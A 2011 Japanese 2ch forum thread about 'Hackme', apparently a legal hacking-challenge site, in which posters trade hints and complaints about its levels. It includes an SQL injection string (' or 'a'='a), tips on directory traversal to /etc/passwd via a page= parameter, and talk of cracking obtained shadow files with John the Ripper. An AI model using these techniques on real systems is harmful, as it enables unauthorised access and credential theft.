【Hackme】ハッキング力検定サイトHackme
1 :名無しさん@お腹いっぱい。:
|
|
|
2 :名無しさん@お腹いっぱい。:2011/02/16(水) 23:26:23
Lv2クリアできねぇ・・・
3 :名無しさん@お腹いっぱい。:2011/02/17(木) 00:15:01
だめだ
Lv2から変な変数が定義されまくっててぐっちゃぐちゃだ
Lv2から変な変数が定義されまくっててぐっちゃぐちゃだ
4 :名無しさん@お腹いっぱい。:2011/02/17(木) 11:41:45
だれかLv2クリアできた奴いる?
5 :名無しさん@お腹いっぱい。:2011/02/17(木) 12:14:42
たぶんいない
作者がLv1で詰んでるやつ大杉って嘲笑してる・・・
作者がLv1で詰んでるやつ大杉って嘲笑してる・・・
6 :名無しさん@お腹いっぱい。:2011/02/17(木) 13:46:55
ツイッターによるとLv5まであるらしいな
ムズすぎだろこれ
ムズすぎだろこれ
7 :名無しさん@お腹いっぱい。:2011/02/17(木) 18:54:53
おまえら頑張れよ2からすすめねえ
8 :名無しさん@お腹いっぱい。:2011/02/17(木) 19:06:01
やっぱみんな2か
開発じゃなくてIAサーバ設計構築・運用しか経験ないからスクリプトとかあんまわからん
開発じゃなくてIAサーバ設計構築・運用しか経験ないからスクリプトとかあんまわからん
9 :名無しさん@お腹いっぱい。:2011/02/17(木) 21:12:06
これって手段は何でもいいのかな?
10 :名無しさん@お腹いっぱい。:2011/02/17(木) 21:59:17
まずは手段とか犯罪以外なんでもいいから、Lv2クリアした猛者あらわれてほしい
11 :名無しさん@お腹いっぱい。:2011/02/17(木) 22:37:11
blackbuntuかbacktrack持ち出して徹底的にやってみろ
12 :名無しさん@お腹いっぱい。:2011/02/18(金) 12:53:48
アングラ攻略サイトのほうがおもしろいな
レベルが上がるごとに難易度も上がればやる気出るけど、これじゃ開発者のオナニーじゃん
レベルが上がるごとに難易度も上がればやる気出るけど、これじゃ開発者のオナニーじゃん
13 :名無しさん@お腹いっぱい。:2011/02/18(金) 13:10:46
なんか急に人増えたな
サイト落ちたりしないのか?
サイト落ちたりしないのか?
14 :名無しさん@お腹いっぱい。:2011/02/18(金) 13:21:59
15 :名無しさん@お腹いっぱい。:2011/02/18(金) 13:28:53
16 :名無しさん@お腹いっぱい。:2011/02/18(金) 13:29:57
オナニーだな完全に
でもLv5いきたいお
でもLv5いきたいお
17 :名無しさん@お腹いっぱい。:2011/02/18(金) 14:26:34
firefoxで最初のページから進まなくて
それ自体がテストだとしばらく・・・というかかなり悩んだ件。
Lv1のページに行くこともできなかったヨ。
ってかマジでLv1と2の差が大きいなw
それ自体がテストだとしばらく・・・というかかなり悩んだ件。
Lv1のページに行くこともできなかったヨ。
ってかマジでLv1と2の差が大きいなw
18 :名無しさん@お腹いっぱい。:2011/02/18(金) 17:57:48
>>12,14
Lv2のヒント教えてくれ
Lv2のヒント教えてくれ
19 :名無しさん@お腹いっぱい。:2011/02/18(金) 19:58:24
セキュ板住民は誰も突破できないか・・・
UNIXにスレたてた方がよかったんじゃないか
UNIXにスレたてた方がよかったんじゃないか
20 :名無しさん@お腹いっぱい。:2011/02/18(金) 20:13:57
いや、セキュ板で合ってると思う
でなければプログラ民か
でなければプログラ民か
21 :名無しさん@お腹いっぱい。:2011/02/18(金) 20:18:46
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
こいつらかっけー
(Lv3) xKalimantan 称号:ハッカー
こいつらかっけー
22 :名無しさん@お腹いっぱい。:2011/02/18(金) 20:20:23
亀頭満タンww
23 :名無しさん@お腹いっぱい。:2011/02/19(土) 01:26:35
(Lv3) rastynail 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
(Lv3) ritton 称号:ハッカー
(Lv3) ymzkei5 称号:ハッカー
(Lv3) xKalimantan 称号:ハッカー
(Lv3) ritton 称号:ハッカー
(Lv3) ymzkei5 称号:ハッカー
24 :名無しさん@お腹いっぱい。:2011/02/19(土) 17:27:55
Lv2で挫折した…orz
25 :名無しさん@お腹いっぱい。:2011/02/19(土) 17:57:36
難しいよなぁLv2
26 :名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:07.48
>>3
バカか?スクリプトって。。。jqueryとかgoogle anal とかしか使ってないだろうが。。。
バカか?スクリプトって。。。jqueryとかgoogle anal とかしか使ってないだろうが。。。
27 :名無しさん@お腹いっぱい。:2011/02/19(土) 19:59:54.72
Lv2って突破に必要な情報無くね?
必要な情報は全部cgi内か
必要な情報は全部cgi内か
28 :名無しさん@お腹いっぱい。:2011/02/19(土) 22:02:21.23
29 :名無しさん@お腹いっぱい。:2011/02/19(土) 22:30:56.10
返ってくるエラーからヒント見つけろ
30 :名無しさん@お腹いっぱい。:2011/02/20(日) 00:28:11.50
そんなのハッキングじゃなくて昭和のアドベンチャーゲームだろ…
31 :名無しさん@お腹いっぱい。:2011/02/20(日) 02:33:07.82
32 : 冒険の書【Lv=5,xxxPT】 :2011/02/20(日) 02:45:19.09
レベル2はソースんなかには答えは絶対ねえよな(´・ω・`)
んじゃあどこにあるんだ( ゚Д゚)ヴォケ!!
んじゃあどこにあるんだ( ゚Д゚)ヴォケ!!
33 :名無しさん@お腹いっぱい。:2011/02/20(日) 02:49:12.41
ですね
34 :名無しさん@お腹いっぱい。:2011/02/20(日) 03:45:55.64
レベル2は、ユーザIDに適当な値入れて
パスワードに、「' or 'a'='a」とか入れるとPHPのエラーが出るから
SQLインジェクションあたりじゃないの?
もう力尽きて寝る
パスワードに、「' or 'a'='a」とか入れるとPHPのエラーが出るから
SQLインジェクションあたりじゃないの?
もう力尽きて寝る
35 :名無しさん@お腹いっぱい。:2011/02/20(日) 05:29:07.95
たかが腕試しとバカにしてた
全然わからないorz
全然わからないorz
36 :名無しさん@お腹いっぱい。:2011/02/20(日) 09:05:21.82
Lv2はソース見るんじゃなくてSQLインジェクションであるのは間違いないはずなんだが・・・
エラーの内容も不思議で、そっからどう考察していいのか分からん。
エラーの内容も不思議で、そっからどう考察していいのか分からん。
37 :名無しさん@お腹いっぱい。:2011/02/20(日) 13:42:04.86
ああいうエラーが出るんだったら、別にあの文字入れなくてもエラーが出るはずなんだよな。本当は。
38 :名無しさん@お腹いっぱい。:2011/02/20(日) 14:48:55.96
すげー。
SQLインジェクションだとか気づかなかった。
じゃぁLv3がXSSか。
SQLインジェクションだとか気づかなかった。
じゃぁLv3がXSSか。
39 :名無しさん@お腹いっぱい。:2011/02/20(日) 18:21:53.41
俺はXSS専門だから諦めた
頑張れよ
頑張れよ
40 :名無しさん@お腹いっぱい。:2011/02/20(日) 19:38:45.56
このスレ、レベルが低すぎる…
41 :名無しさん@お腹いっぱい。:2011/02/20(日) 19:54:47.15
wwwwwwwwwwwwwwwwwwwwww
42 :名無しさん@お腹いっぱい。:2011/02/20(日) 21:20:31.83
なんか、エラーメッセージが変わっている……。
中の人、何を考えているのやら。
中の人、何を考えているのやら。
43 :名無しさん@お腹いっぱい。:2011/02/20(日) 22:34:10.86
前のメッセージでも十分だったのに更にわかりやすくなったなw
44 :名無しさん@お腹いっぱい。:2011/02/20(日) 23:55:37.80
SQLインジェクションなんだと思うけど、モノホンの脆弱性が作ってあるんじゃなくて(当たり前か)
SQLインジェクションっぽい動作をするニセモノだから、モノホンの脆弱性を突くツールとかが
通用しなくて、結局のところ、連想クイズになっちゃってる。
SQLインジェクションっぽい動作をするニセモノだから、モノホンの脆弱性を突くツールとかが
通用しなくて、結局のところ、連想クイズになっちゃってる。
45 :名無しさん@お腹いっぱい。:2011/02/21(月) 00:09:20.51
いつの間にかLv3突破した奴いるぞwwww
46 :名無しさん@お腹いっぱい。:2011/02/21(月) 01:00:09.67
複数のアカウントを一人が作成可能っぽいから
一人が何個もとってたりして…
一人が何個もとってたりして…
47 :名無しさん@お腹いっぱい。:2011/02/21(月) 08:23:21.64
>>46
それ何の意味があるんだ?
それ何の意味があるんだ?
48 :名無しさん@お腹いっぱい。:2011/02/21(月) 08:26:33.79
複数のアカウントでネット上の活動をしてる人間には大あり
49 :名無しさん@お腹いっぱい。:2011/02/21(月) 11:48:41.62
50 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:33:44.95
Lv2 ひどいな。
作者の記述スタイルに添って書かねばならんとは。
これじゃ、パスワード推測とほとんど変わらん。
作者の記述スタイルに添って書かねばならんとは。
これじゃ、パスワード推測とほとんど変わらん。
51 :sage:2011/02/21(月) 12:40:26.84 BE:2778590467-2BP(101)
クエリエラーが出たから、今度はさらにクエリエラーをでない形に持って行って
そこからWhere句をTrueに持っていく構文を書けばいいのだろうと思うのだが
まず、エスケープシーケンスにしてもクエリエラーが絶対出る
推理できん
そこからWhere句をTrueに持っていく構文を書けばいいのだろうと思うのだが
まず、エスケープシーケンスにしてもクエリエラーが絶対出る
推理できん
52 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:47:23.23
>>51 たぶん、本質的には正解。
後は、スペースのありなしとか大文字小文字とかTrue にするための式とかのバリエーションを
順列組み合わせで試していくしかない。
こんなのに、休日関わっていた俺ってバカ。
後は、スペースのありなしとか大文字小文字とかTrue にするための式とかのバリエーションを
順列組み合わせで試していくしかない。
こんなのに、休日関わっていた俺ってバカ。
53 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:47:55.58
whereをtrueというより作者の記述の仕方でtrueにしなきゃいけないみたいだからきついんじゃないか
54 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:49:23.89
正解判定を正規表現マッチで行うくらい、普通のエンジニアならやるのにな。
とにかく、かなりむかつきました。
とにかく、かなりむかつきました。
55 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:50:48.06
むかつかせるのが目的
56 :名無しさん@お腹いっぱい。:2011/02/21(月) 12:59:52.70
57 :名無しさん@お腹いっぱい。:2011/02/21(月) 13:05:39.22
sqlインジェクションというなの文字列比較w
58 :名無しさん@お腹いっぱい。:2011/02/21(月) 13:09:10.48
ヒント: α版
59 :名無しさん@お腹いっぱい。:2011/02/21(月) 13:41:54.70
β版を待て、ってことか?
あと、あのサイトは何が目的なんだ?
あと、あのサイトは何が目的なんだ?
60 :名無しさん@お腹いっぱい。:2011/02/21(月) 13:56:02.31
作者の思考は万人共通かを測ること
61 :名無しさん@お腹いっぱい。:2011/02/21(月) 13:58:04.21
会社の売名だろ?
62 :名無しさん@お腹いっぱい。:2011/02/21(月) 14:17:50.21
(Lv4) yoshimura_yuu 称号:ハッカー
このスレにいないのか?
このスレにいないのか?
63 :名無しさん@お腹いっぱい。:2011/02/21(月) 14:27:18.45
twitter にいるみたい。
64 :名無しさん@お腹いっぱい。:2011/02/21(月) 14:55:13.65
65 :名無しさん@お腹いっぱい。:2011/02/21(月) 18:26:35.57
作者の答えとぴったり一致しないといけないのか・・・
やられた
やられた
66 :名無しさん@お腹いっぱい。:2011/02/21(月) 18:39:57.16
ダミーのDBMSと接続して、実際にSQL走らせるくらいして欲しい
SQLiteあたりの組込みDBMS使えば、ユーザ毎に違うDB使えるでしょ
SQLiteあたりの組込みDBMS使えば、ユーザ毎に違うDB使えるでしょ
67 :名無しさん@お腹いっぱい。:2011/02/21(月) 18:46:45.94
>>66
でも負荷大きそうだな
でも負荷大きそうだな
68 :名無しさん@お腹いっぱい。:2011/02/21(月) 21:06:04.72
難しいよ
lv2
lv2
69 :名無しさん@お腹いっぱい。:2011/02/21(月) 22:06:56.86
ふっ、このスレにはまだLv2を越えたやつはいないようだな。
俺を含めて
俺を含めて
70 :名無しさん@お腹いっぱい。:2011/02/21(月) 22:10:19.95
Lv2はクリアしたけどLv3難しいな
触ってみた感じXSSだと思うけど…
触ってみた感じXSSだと思うけど…
71 :名無しさん@お腹いっぱい。:2011/02/21(月) 22:13:39.62
ゴールデンクロスサイトスクリプティング!!!!!
72 :名無しさん@お腹いっぱい。:2011/02/22(火) 00:50:25.51
みんながブー垂れたからか、Lv2、一字一句同じじゃないとダメっていうのじゃなくなったみたい。
73 :名無しさん@お腹いっぱい。:2011/02/22(火) 01:01:14.96
ハックミーはおわコン
74 :名無しさん@お腹いっぱい。:2011/02/22(火) 01:55:46.87
75 :名無しさん@お腹いっぱい。:2011/02/22(火) 02:08:40.49
XSSじゃサーバー側の認証は突破できないんじゃね?
page=を何とかするんだと思うんだが、もうやる気はない。
page=を何とかするんだと思うんだが、もうやる気はない。
76 :名無しさん@お腹いっぱい。:2011/02/22(火) 02:19:23.98
77 :名無しさん@お腹いっぱい。:2011/02/22(火) 02:40:06.77
見栄張ってlv2クリアした発言するのはどこも一緒だな
78 :名無しさん@お腹いっぱい。:2011/02/22(火) 04:13:35.55
最後の2文字足りなかっただけで2日なやんでたとか・・・
あってもなくてもどっちも常套句だろー
あってもなくてもどっちも常套句だろー
79 :名無しさん@お腹いっぱい。:2011/02/22(火) 05:51:17.01
ちなみにLv3をクリアした俺はプログラムなんて一切組めない
HTMLが多少わかる程度だよ
HTMLが多少わかる程度だよ
80 :名無しさん@お腹いっぱい。:2011/02/22(火) 06:36:46.11
これが現代の邪気眼発動者か
81 :名無しさん@お腹いっぱい。:2011/02/22(火) 07:42:14.97
Lv3は最初XSSかと思ったけどXSSができたところでなんだという話だよな…
ただ、XSSみたいなことをすると他と違うエラーが返ってくるね
閉じるタグがはねられる
ただ、XSSみたいなことをすると他と違うエラーが返ってくるね
閉じるタグがはねられる
82 :名無しさん@お腹いっぱい。:2011/02/22(火) 07:56:16.44
>>81
閉じるタグがはねられる?
閉じるタグがはねられる?
83 :名無しさん@お腹いっぱい。:2011/02/22(火) 08:31:30.74
昨日さくっとやってみた
とりあえずLv.4まではそんなに困ることなくいけたけど
Lv.5は難しくてパっとはできなかった
とりあえずLv.4まではそんなに困ることなくいけたけど
Lv.5は難しくてパっとはできなかった
85 :名無しさん@お腹いっぱい。:2011/02/22(火) 09:46:11.44
ってことはLv5をクリアしちゃったってことか・・・凄いな
86 :名無しさん@お腹いっぱい。:2011/02/22(火) 09:59:54.38
ランキングで5クリアしてる奴いない・・・
87 :名無しさん@お腹いっぱい。:2011/02/22(火) 10:34:32.30
釣りじゃねーの
88 :名無しさん@お腹いっぱい。:2011/02/22(火) 11:10:19.92
lv2クリアした。
なんだかんだ言ってるけど一般的じゃないかw
レベル3に行くぜよ。
なんだかんだ言ってるけど一般的じゃないかw
レベル3に行くぜよ。
89 :名無しさん@お腹いっぱい。:2011/02/22(火) 11:21:27.24
>>82
とにかく、<〜></〜>って形式の物を送ると、
The input field '</〜>' was not expected.
って出る。
>>83
URL、確かに特徴的だけど、それをどうすればいいんだかわからんw
とにかく、<〜></〜>って形式の物を送ると、
The input field '</〜>' was not expected.
って出る。
>>83
URL、確かに特徴的だけど、それをどうすればいいんだかわからんw
91 :名無しさん@お腹いっぱい。:2011/02/22(火) 11:28:14.24
92 :名無しさん@お腹いっぱい。:2011/02/22(火) 12:46:53.94
>>92
それ多分XSSの形式とは関係ないかな
Lv.1とかから同じようにでてくると思う
俺もLv.5でひょっとして、と思って試そうとしたけど
5で独自に作りこまれたものじゃなさそうだったからやめたー
それ多分XSSの形式とは関係ないかな
Lv.1とかから同じようにでてくると思う
俺もLv.5でひょっとして、と思って試そうとしたけど
5で独自に作りこまれたものじゃなさそうだったからやめたー
94 :名無しさん@お腹いっぱい。:2011/02/22(火) 13:17:18.70
95 :名無しさん@お腹いっぱい。:2011/02/22(火) 13:29:14.22
>>93
ソースにヒントがあるってこと?
ソースにヒントがあるってこと?
>>94,95
エラーはいろいろ教えてくれてると思うけど、俺はそれ見る前に終わった様子
ソースにヒントはさすがに最初の方だけかと
ネタバレは禁止みたいなんでこのくらいで勘弁してください(;つД`)
これからちょっと触って落ちます
エラーはいろいろ教えてくれてると思うけど、俺はそれ見る前に終わった様子
ソースにヒントはさすがに最初の方だけかと
ネタバレは禁止みたいなんでこのくらいで勘弁してください(;つД`)
これからちょっと触って落ちます
97 :名無しさん@お腹いっぱい。:2011/02/22(火) 15:58:01.49
Lv3が相当つまらないらしいな
98 :名無しさん@お腹いっぱい。:2011/02/22(火) 16:03:46.84
HACKME 1.0 LEVEL 4
http://www.youtube.com/watch?v=OF_0KXuGS78
http://www.youtube.com/watch?v=OF_0KXuGS78
99 :名無しさん@お腹いっぱい。:2011/02/22(火) 16:07:58.48
>>97
別につまらなくはないけど今の時代じゃありえない状態になってる
別につまらなくはないけど今の時代じゃありえない状態になってる
100 :名無しさん@お腹いっぱい。:2011/02/22(火) 16:08:03.41
会社のIDSに記録がw
ツールも落とせないwww
おれログ汚しまくりwwwwwwwww
ツールも落とせないwww
おれログ汚しまくりwwwwwwwww
101 :名無しさん@お腹いっぱい。:2011/02/22(火) 16:20:40.73
泣けるな
お前の会社にも、実はインターネット直通のステルスAPとかあるんだろ?
お前の会社にも、実はインターネット直通のステルスAPとかあるんだろ?
102 :名無しさん@お腹いっぱい。:2011/02/22(火) 18:21:28.96
lv3の解きかた方が分かったけど進まないw
ありえないとはこういうことかな・・・
ありえないとはこういうことかな・・・
103 :名無しさん@お腹いっぱい。:2011/02/22(火) 20:12:40.15
だめだ・・・。Lv3わかりません。
上の方で、XSSなどと出てましたが、結局いろいろと試してもうまくいきません。
上の方で、XSSなどと出てましたが、結局いろいろと試してもうまくいきません。
104 :名無しさん@お腹いっぱい。:2011/02/22(火) 20:19:04.26
105 :名無しさん@お腹いっぱい。:2011/02/22(火) 20:42:25.02
おい、ランキングのLv3に変なのがいるぞ
106 :名無しさん@お腹いっぱい。:2011/02/22(火) 20:42:47.98
お前らそればっかやってないで
http://www.hackthissite.org/user/create
これやらね?ジャンル毎にいろんな問題あって面白いぞ
俺は今IRCミッションに取りかかってるがイマイチよくわからん
http://www.hackthissite.org/user/create
これやらね?ジャンル毎にいろんな問題あって面白いぞ
俺は今IRCミッションに取りかかってるがイマイチよくわからん
107 :名無しさん@お腹いっぱい。:2011/02/22(火) 21:38:58.98
Lv2の答えくれLv3からならわかるきがする
108 :名無しさん@お腹いっぱい。:2011/02/22(火) 23:07:14.97
じゃあおれはlv3とlv4答えてくれlv5なら余裕でわかるきがするw
109 :名無しさん@お腹いっぱい。:2011/02/22(火) 23:42:06.30
Lv3わかんねぇ…。URLが何か変って事しか理解できない…orz
110 :名無しさん@お腹いっぱい。:2011/02/22(火) 23:44:12.73
lv3でけた、ものすごく単純で正攻法でしたw
111 :名無しさん@お腹いっぱい。:2011/02/22(火) 23:55:19.49
あーあtwitterでほとんどlv3の答え書いちゃったやついるよ
112 :名無しさん@お腹いっぱい。:2011/02/23(水) 00:10:16.72
>>110
ものすごく単純で正攻法ならもっとクリアする奴は多いと思う
本来あれを見れるって権限的におかしいから発想だけの問題だろうな
>>111自分で答えを出すまでの行程が楽しいのであっていきなり答えにいっても楽しくないのに!
ものすごく単純で正攻法ならもっとクリアする奴は多いと思う
本来あれを見れるって権限的におかしいから発想だけの問題だろうな
>>111自分で答えを出すまでの行程が楽しいのであっていきなり答えにいっても楽しくないのに!
113 :名無しさん@お腹いっぱい。:2011/02/23(水) 00:15:39.00
片方は権限的にも問題なくないか
114 :名無しさん@お腹いっぱい。:2011/02/23(水) 00:35:51.73
115 :名無しさん@お腹いっぱい。:2011/02/23(水) 00:42:18.84
たしかに片方だけじゃでないけどさ、まあhackmeってことを考慮して一応みとくみたいな
116 :名無しさん@お腹いっぱい。:2011/02/23(水) 01:19:02.11
ここburpsuite使えないよな?
117 :名無しさん@お腹いっぱい。:2011/02/23(水) 02:04:50.15
lv4わかんねー、ブルートフォースはどのlvでもないみたいだし
118 :名無しさん@お腹いっぱい。:2011/02/23(水) 02:15:51.49
>>107
Lv2はほとんどこのスレに答え書いてあるじゃん
Lv3はわかんね
『**さんの称号は「ちょっと詳しい人」です。
周りから一目置かれている存在でしょう。物知りですね。』
ってのがなんかむかつくw
Lv2はほとんどこのスレに答え書いてあるじゃん
Lv3はわかんね
『**さんの称号は「ちょっと詳しい人」です。
周りから一目置かれている存在でしょう。物知りですね。』
ってのがなんかむかつくw
119 :名無しさん@お腹いっぱい。:2011/02/23(水) 04:14:35.38
何かの役に立てばと思い
ttp://thinkit.co.jp/free/tech/7/5/1.html
ttp://thinkit.co.jp/free/tech/7/5/1.html
120 : ◆nBKtuESn6cjs :2011/02/23(水) 06:46:23.39
>>119
そのまんまだなww
そのまんまだなww
121 :名無しさん@お腹いっぱい。:2011/02/23(水) 08:34:03.47
122 :名無しさん@お腹いっぱい。:2011/02/23(水) 09:17:16.90
lv3で既にネタバレしている範囲で書くけど・・・
両方見たところでどうなるんだ?
直接クリアには繋がらない。
それとも分かればなんなくクリアできる方法なのかい?
両方見たところでどうなるんだ?
直接クリアには繋がらない。
それとも分かればなんなくクリアできる方法なのかい?
123 :名無しさん@お腹いっぱい。:2011/02/23(水) 10:29:36.17
難なくクリアできたよ
124 :名無しさん@お腹いっぱい。:2011/02/23(水) 10:31:20.72
難なく・・・
ツハモノだよなぁ
ツハモノだよなぁ
125 :名無しさん@お腹いっぱい。:2011/02/23(水) 10:32:58.60
>>123,124
難なくってどういう意味?
難なくってどういう意味?
126 :名無しさん@お腹いっぱい。:2011/02/23(水) 10:57:02.39
難なく・・・か。
きっと俺たちは違う方向へ無駄にがんばっているんだな。
目の前の相棒が脳みそフル回転でがんばってくれているw
もう止めてあげよう、こんなに無駄なわけはない。
きっと俺たちは違う方向へ無駄にがんばっているんだな。
目の前の相棒が脳みそフル回転でがんばってくれているw
もう止めてあげよう、こんなに無駄なわけはない。
127 :名無しさん@お腹いっぱい。:2011/02/23(水) 11:21:07.88
Lv3クリアできたよ!!!!
一応管理者ですよ、はい。
自宅サーバーのねwww
↑
本当にクリアできた人にはわかるだろうw
一応管理者ですよ、はい。
自宅サーバーのねwww
↑
本当にクリアできた人にはわかるだろうw
128 :名無しさん@お腹いっぱい。:2011/02/23(水) 11:38:09.02
うん
3はクリアできたけどさ
Lv4はUA部分なのかCookieなのか
何を使うのかわからん
3はクリアできたけどさ
Lv4はUA部分なのかCookieなのか
何を使うのかわからん
129 :名無しさん@お腹いっぱい。:2011/02/23(水) 11:47:01.04
lv3クリアのために俺の4COREが珍しく30%稼動してるゼ!
130 :名無しさん@お腹いっぱい。:2011/02/23(水) 12:07:11.46
連続スマン、lv3クリアしたが、一言言わせてもらう。
XSS釣りだろ、むしろlv4こそXSSやもだ。
XSS釣りだろ、むしろlv4こそXSSやもだ。
131 :名無しさん@お腹いっぱい。:2011/02/23(水) 12:51:12.63
lv3ヒントください。
urlいくらいじっても見つからないし、他のやり方?
urlいくらいじっても見つからないし、他のやり方?
132 :名無しさん@お腹いっぱい。:2011/02/23(水) 13:10:56.33
今日始めた俺からヒント
XSSは釣り、ディレクトリ遡れ
ここのスレのせいで6時間無駄にしたお。
XSSは釣り、ディレクトリ遡れ
ここのスレのせいで6時間無駄にしたお。
133 :名無しさん@お腹いっぱい。:2011/02/23(水) 14:03:16.39
lv3はこの前2chがハックされたような感じだな。
134 :名無しさん@お腹いっぱい。:2011/02/23(水) 14:17:39.37
hackmeって合法的にハックしていいんだよね?
135 :名無しさん@お腹いっぱい。:2011/02/23(水) 14:25:47.39
136 :名無しさん@お腹いっぱい。:2011/02/23(水) 14:30:24.02
137 :名無しさん@お腹いっぱい。:2011/02/23(水) 15:21:00.06
ディレクトリ遡るって、root見るって事?
パスワードmd5暗号化されてない?
てか、俺のそもそものプロセスが間違えてる?
ボクニハムリデシタ
パスワードmd5暗号化されてない?
てか、俺のそもそものプロセスが間違えてる?
ボクニハムリデシタ
138 :名無しさん@お腹いっぱい。:2011/02/23(水) 15:52:36.73
>>136
疑問を投げかけられても目の前で起きている事が事実だ。
多分君にはこの先は本当に無理だよ。
lv3はすぐ方法が分かったけど
lv4はヒントが少ないなぁ。
方法が絞れなくて思いつくこと試してたら日が暮れるw
自分のところにだけ引っ付いてるゴミが味噌なのだろうか・・・
疑問を投げかけられても目の前で起きている事が事実だ。
多分君にはこの先は本当に無理だよ。
lv3はすぐ方法が分かったけど
lv4はヒントが少ないなぁ。
方法が絞れなくて思いつくこと試してたら日が暮れるw
自分のところにだけ引っ付いてるゴミが味噌なのだろうか・・・
140 :名無しさん@お腹いっぱい。:2011/02/23(水) 16:23:44.14
たぶんLv.3わかったわ
それらしいファイル吐かれたし
問題はこれをどのように使うかだ…
それらしいファイル吐かれたし
問題はこれをどのように使うかだ…
141 :名無しさん@お腹いっぱい。:2011/02/23(水) 16:36:45.78
>>140
わかってなくね?
わかってなくね?
142 :名無しさん@お腹いっぱい。:2011/02/23(水) 16:56:13.58
143 :名無しさん@お腹いっぱい。:2011/02/23(水) 16:59:22.00
DOS attack ですねわかります
144 :名無しさん@お腹いっぱい。:2011/02/23(水) 17:04:24.02
lv1〜3まで非実用的なものだったから1v4も多分そうなんだ
lv4は総当りやりたくなる誘惑があるw
lv4は総当りやりたくなる誘惑があるw
145 :名無しさん@お腹いっぱい。:2011/02/23(水) 17:29:28.36
>>144
だれかそれでbanされたぞw
だれかそれでbanされたぞw
146 :名無しさん@お腹いっぱい。:2011/02/23(水) 17:41:16.38
トップページ変わった
1万人突破らしい
1万人突破らしい
147 :名無しさん@お腹いっぱい。:2011/02/23(水) 17:50:29.12
もっと派手に変えりゃいいものをw
148 :名無しさん@お腹いっぱい。:2011/02/23(水) 17:59:30.27
149 :名無しさん@お腹いっぱい。:2011/02/23(水) 18:01:20.03
lv4は4人、lv3は76人とは
lv3の篭城は崩れたようだがlv4はまるで新世界だなw
lv3の篭城は崩れたようだがlv4はまるで新世界だなw
150 :名無しさん@お腹いっぱい。:2011/02/23(水) 18:10:48.10
lv3がこんなに増えたのはtwitterで何も考えないアホな奴が
ほとんどネタバレに近いことを書いてるからだと思うよ。
ほとんどネタバレに近いことを書いてるからだと思うよ。
151 :名無しさん@お腹いっぱい。:2011/02/23(水) 18:37:13.86
lv4の問題載せるのはアリですか?
152 :名無しさん@お腹いっぱい。:2011/02/23(水) 18:42:57.76
lv3の解答を載せてからならアリ
153 :名無しさん@お腹いっぱい。:2011/02/23(水) 19:43:13.77
lV3わかんないお。。。
154 :名無しさん@お腹いっぱい。:2011/02/23(水) 20:43:49.77
第五のlv4にネットファイアの中の人がw
完全に出遅れたお
完全に出遅れたお
155 :名無しさん@お腹いっぱい。:2011/02/23(水) 22:08:33.62
>>149
Lv4は新世界の四皇か
Lv4は新世界の四皇か
156 :名無しさん@お腹いっぱい。:2011/02/23(水) 22:27:19.15
ダメだ、lv3解けて当然になってるのに
lv4全くわかんねえ。
そうだ、ヒントだ、ヒント。ヒントを、ヒントをくれ!
お願いだ!!頼・・・む...
とかいってみるテスト
lv4全くわかんねえ。
そうだ、ヒントだ、ヒント。ヒントを、ヒントをくれ!
お願いだ!!頼・・・む...
とかいってみるテスト
157 :名無しさん@お腹いっぱい。:2011/02/23(水) 23:19:01.08
あー俺もたぶん>>137と同じ状況で行き詰った。
暗号化解析すんのこれ?
暗号化解析すんのこれ?
158 :名無しさん@お腹いっぱい。:2011/02/23(水) 23:22:53.12
lv4簡易化修正入りました
159 :名無しさん@お腹いっぱい。:2011/02/23(水) 23:44:44.42
ところでlv1の答えを教えてくんないかな?
160 :名無しさん@お腹いっぱい。:2011/02/24(木) 00:12:35.51
1万人たっせいからの75倍のアクセス、だれだよやったのw
161 :名無しさん@お腹いっぱい。:2011/02/24(木) 00:12:40.63
24時間かけても無理だった。
俺は所詮、スクリプトキディに過ぎなかったか。
おまいらも、もう認めたらどうなんだ。
週末まで元の生活に戻るとしよう・・・・・・。
俺は所詮、スクリプトキディに過ぎなかったか。
おまいらも、もう認めたらどうなんだ。
週末まで元の生活に戻るとしよう・・・・・・。
162 :名無しさん@お腹いっぱい。:2011/02/24(木) 00:18:30.77
ハム速ってブログが載せてたけどそのせいで503とかうぜぇわ・・・
163 :名無しさん@お腹いっぱい。:2011/02/24(木) 01:29:23.55
LV4のヒントって前からあったのかな 露骨すぎワロタ
164 :名無しさん@お腹いっぱい。:2011/02/24(木) 01:58:38.28
165 :名無しさん@お腹いっぱい。:2011/02/24(木) 02:30:45.40
page= に何を入れたらいいかさっぱり分からん。 /etc/passwdとかダメだし。。。
166 :名無しさん@お腹いっぱい。:2011/02/24(木) 02:38:48.71
Lv3で2つのファイル見れたけど意味がわからない
ヒントない?
ヒントない?
167 :名無しさん@お腹いっぱい。:2011/02/24(木) 02:55:46.67
ありえないパスで見れたけど、パスクラ持ってないよ
168 :名無しさん@お腹いっぱい。:2011/02/24(木) 02:56:52.52
>>129
何かオススメある?John the GUIとかがよいの?
何かオススメある?John the GUIとかがよいの?
169 :名無しさん@お腹いっぱい。:2011/02/24(木) 02:59:54.33
170 :名無しさん@お腹いっぱい。:2011/02/24(木) 03:17:10.28
ただのツールの使い方じゃねえかw
171 :名無しさん@お腹いっぱい。:2011/02/24(木) 03:19:11.51
どのツールがよいのか教えててよ
172 :名無しさん@お腹いっぱい。:2011/02/24(木) 03:25:44.29
ggrks
173 :名無しさん@お腹いっぱい。:2011/02/24(木) 04:36:22.67
今やってきてLv2までクリアしたけど、にわかじゃあLv3わからねぇー
そもそもなんの認証使ってるかもわからんのじゃ無理w
そもそもなんの認証使ってるかもわからんのじゃ無理w
174 :名無しさん@お腹いっぱい。:2011/02/24(木) 04:45:17.49
175 :名無しさん@お腹いっぱい。:2011/02/24(木) 04:56:24.76
結局ゴリ押しなのか。。。
176 :名無しさん@お腹いっぱい。:2011/02/24(木) 04:59:23.44
4はどうみてもXSS系なんだけどなぁ
177 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:04:51.91
二つのファイルは手に入った
John the guiでunshadowしたいんだけど、mhtファイルのままでいいの?
John the guiでunshadowしたいんだけど、mhtファイルのままでいいの?
178 :名無しさん@お腹いっぱい。:2011/02/24(木) 05:19:17.25
人に聞くのもいいけど自分で調べてこそハッカーや
ソーシャルは別な
ソーシャルは別な
